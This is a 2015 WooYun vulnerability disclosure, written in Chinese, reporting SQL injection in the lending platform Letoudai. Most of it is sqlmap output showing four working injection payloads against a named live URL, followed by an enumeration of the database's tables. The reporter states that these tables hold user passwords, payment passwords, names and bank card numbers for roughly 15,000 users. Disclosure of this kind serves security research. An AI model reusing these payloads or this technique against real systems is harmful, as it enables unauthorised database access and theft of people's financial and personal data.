当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0144384

漏洞标题:P2P理财投资平台安全之乐投贷存在SQL注入(涉及上万用户账号密码,支付密码,姓名及银行卡号等信息)

相关厂商:乐投贷

漏洞作者: 中央军

提交时间:2015-10-01 13:39

修复时间:2015-11-15 13:40

公开时间:2015-11-15 13:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-01: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-11-15: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

https://www.letoudai.com/invest/index/1*/export/1/serial_number/1/money/1

11.jpg

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: https://www.letoudai.com:443/invest/index/1') RLIKE (SELECT (CASE WHEN (6441=6441) THEN 1 ELSE 0x28 END)) AND ('WaVc'='WaVc/export/1/serial_number/1/money/1
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: https://www.letoudai.com:443/invest/index/1') AND EXTRACTVALUE(3581,CONCAT(0x5c,0x716b627171,(SELECT (ELT(3581=3581,1))),0x7178786271)) AND ('yTKa'='yTKa/export/1/serial_number/1/money/1
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: https://www.letoudai.com:443/invest/index/1');SELECT SLEEP(5) AND ('SkQF'='SkQF/export/1/serial_number/1/money/1
Type: AND/OR time-based blind
Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
Payload: https://www.letoudai.com:443/invest/index/1') AND 2619=BENCHMARK(5000000,MD5(0x4342426e)) AND ('rDDj'='rDDj/export/1/serial_number/1/money/1
---
web application technology: Nginx
back-end DBMS: MySQL 5.1
Database: ltd
+------------------------+---------+
| Table | Entries |
+------------------------+---------+
| ltd_journal_account | 55005 |
| ltd_ips_return | 40041 |
| ltd_user_log | 38882 |
| ltd_jifen_log | 37981 |
| ltd_account_log | 35828 |
| ltd_phone_log | 30186 |
| ltd_borrow_repay | 20600 |
| ltd_email_log | 16450 |
| ltd_user_message | 16441 |
| ltd_ips_before | 16257 |
| ltd_account | 14961 |
| ltd_user | 14959 | //上万用户
| ltd_user_info | 14959 |
| ltd_user_status | 14959 |
| ltd_user_vip | 12993 |
| ltd_weixin_news | 12944 |
| ltd_user_spread | 8264 |
| ltd_error_log | 8108 |
| ltd_borrow_tender | 7737 |
| ltd_account_recharge | 6397 |
| ltd_activity_log | 5776 |
| ltd_attachment | 4291 |
| ltd_account_cash | 4018 |
| ltd_borrow_verify | 526 |
| ltd_user_setting | 360 |
| ltd_borrow_quota | 244 |
| ltd_document | 220 |
| ltd_borrow | 206 |
| ltd_authmenu | 177 |
| ltd_menu | 169 |
| ltd_auth | 158 |
| ltd_borrow_reward | 132 |
| ltd_rating_info | 101 |
| ltd_attribute | 85 |
| ltd_borrow_che | 63 |
| ltd_borrow_vouch | 61 |
| ltd_borrow_register | 55 |
| ltd_config | 49 |
| ltd_borrow_pawn | 40 |
| ltd_weixindy_reply | 28 |
| ltd_user_auto | 25 |
| ltd_borrow_novice | 20 |
| ltd_user_address | 20 |
| ltd_manage_member | 18 |
| ltd_jifen_exchange | 15 |
| ltd_linkages | 15 |
| ltd_jifen_product | 14 |
| ltd_template | 14 |
| ltd_borrow_roam | 12 |
| ltd_document_category | 12 |
| ltd_weixin_menu | 12 |
| ltd_model | 10 |
| ltd_weixindy_menu | 10 |
| ltd_manage_group | 9 |
| ltd_remind | 9 |
| ltd_borrow_category | 8 |
| ltd_stock | 8 |
| ltd_navigation | 7 |
| ltd_addons | 6 |
| ltd_borrow_repayment | 6 |
| ltd_borrow_credit | 5 |
| ltd_borrow_institution | 5 |
| ltd_topic_config | 5 |
| ltd_weixin_media | 4 |
| ltd_api_account | 3 |
| ltd_autorepay_rule | 3 |
| ltd_hooks | 3 |
| ltd_user_autorepay | 3 |
| ltd_user_group | 3 |
| ltd_topic | 2 |
| ltd_jifen_category | 1 |
| ltd_topic_reply | 1 |
| ltd_topic_signin | 1 |
| ltd_weixin_repay | 1 |
+------------------------+---------+

ltd_user表中包含账号密码和支付密码

12.png

ltd_user_info表中包含姓名和银行卡号等信息:

13.jpg


漏洞证明:

修复方案:

版权声明:转载请注明来源 中央军@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)